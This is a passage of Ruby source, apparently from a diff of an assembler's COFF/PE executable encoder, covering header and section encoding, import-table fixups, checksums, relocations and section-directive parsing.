s.rawaddr.kind_of?(::Integer) # XXX allow to force rawaddr ? - s_table << s.encode(self) - } - - # encode optional header - @optheader.image_size ||= new_label('image_size') - @optheader.image_base ||= label_at(@encoded, 0) - @optheader.headers_size ||= new_label('headers_size') - @optheader.checksum ||= new_label('checksum') - @optheader.subsystem ||= 'WINDOWS_GUI' - @optheader.numrva = nil - opth = @optheader.encode(self) - - # encode header - @header.machine ||= 'UNKNOWN' - @header.num_sect ||= sections.length - @header.time ||= Time.now.to_i & -255 - @header.size_opthdr ||= opth.virtsize - @encoded << @header.encode(self) << opth << s_table - end - - # append the section bodies to @encoded, and link the resulting binary - def encode_sections_fixup - @encoded.align @optheader.file_align - if @optheader.headers_size.kind_of?(::String) - @encoded.fixup! @optheader.headers_size => @encoded.virtsize - @optheader.headers_size = @encoded.virtsize - end - - baseaddr = @optheader.image_base.kind_of?(::Integer) ? @optheader.image_base : 0x400000 - binding = @encoded.binding(baseaddr) - - curaddr = baseaddr + @optheader.headers_size - @sections.each { |s| - # align - curaddr = EncodedData.align_size(curaddr, @optheader.sect_align) - if s.rawaddr.kind_of?(::String) - @encoded.fixup! s.rawaddr => @encoded.virtsize - s.rawaddr = @encoded.virtsize - end - if s.virtaddr.kind_of?(::Integer) - raise "E: COFF: cannot encode section #{s.name}: hardcoded address too short" if curaddr > baseaddr + s.virtaddr - curaddr = baseaddr + s.virtaddr - end - binding.update s.encoded.binding(curaddr) - curaddr += s.virtsize - - pre_sz = @encoded.virtsize - @encoded << s.encoded[0, s.encoded.rawsize] - @encoded.align @optheader.file_align - if s.rawsize.kind_of?(::String) - @encoded.fixup! s.rawsize => (@encoded.virtsize - pre_sz) - s.rawsize = @encoded.virtsize - pre_sz - end - } - - # not aligned ? spec says it is, visual studio does not - binding[@optheader.image_size] = curaddr - baseaddr if @optheader.image_size.kind_of?(::String) - - # patch the iat where iat_p was defined - # sort to ensure a 0-terminated will not overwrite an entry - # (try to dump notepad.exe, which has a forwarder;) - @imports.find_all { |id| id.iat_p.kind_of? Integer }.sort_by { |id| id.iat_p }.each { |id| - s = sect_at_rva(id.iat_p) - @encoded[s.rawaddr + s.encoded.ptr, id.iat.virtsize] = id.iat - binding.update id.iat.binding(baseaddr + id.iat_p) - } if imports - - @encoded.fill - @encoded.fixup! binding - - if @optheader.checksum.kind_of?(::String) and @encoded.reloc.length == 1 - # won't work if there are other unresolved relocs - checksum = self.class.checksum(@encoded.data, @endianness) - @encoded.fixup @optheader.checksum => checksum - @optheader.checksum = checksum - end - end - - # encode a COFF file, building export/import/reloc tables if needed - # creates the base relocation tables (need for references to IAT not known before) - # defaults to generating relocatable files, eg ALSR-aware - # pass want_relocs=false to avoid the file overhead induced by this - def encode(target = 'exe', want_relocs = true) - @encoded = EncodedData.new - label_at(@encoded, 0, 'coff_start') - pre_encode_header(target, want_relocs) - autoimport - encode_exports if export - encode_imports if imports - encode_resource if resource - encode_tls if tls - create_relocation_tables if want_relocs - encode_relocs if relocations - encode_header - encode_sections_fixup - @encoded.data - end - - def parse_init - # ahem... - # a fake object, which when appended makes us parse '.text', which creates a real default section - # forwards to it this first appendage. - # allows the user to specify its own section if he wishes, and to use .text if he doesn't - if not defined? @cursource or not @cursource - @cursource = ::Object.new - class << @cursource - attr_accessor :coff - def <<(*a) - t = Preprocessor::Token.new(nil) - t.raw = '.text' - coff.parse_parser_instruction t - coff.cursource.send(:<<, *a) - end - end - @cursource.coff = self - end - @source ||= {} - super() - end - - # handles compiler meta-instructions - # - # syntax: - # .section "
" - # section name is a string (may be quoted) - # perms are in 'r' 'w' 'x' 'shared' 'discard', may be concatenated (in this order), may be prefixed by 'no' to remove the attribute for an existing section - # base is the token 'base', the token '=' and an immediate expression - # default sections: - # .text = .section '.text' rx - # .data = .section '.data' rw - # .rodata = .section '.rodata' r - # .bss = .section '.bss' rw - # .entrypoint | .entrypoint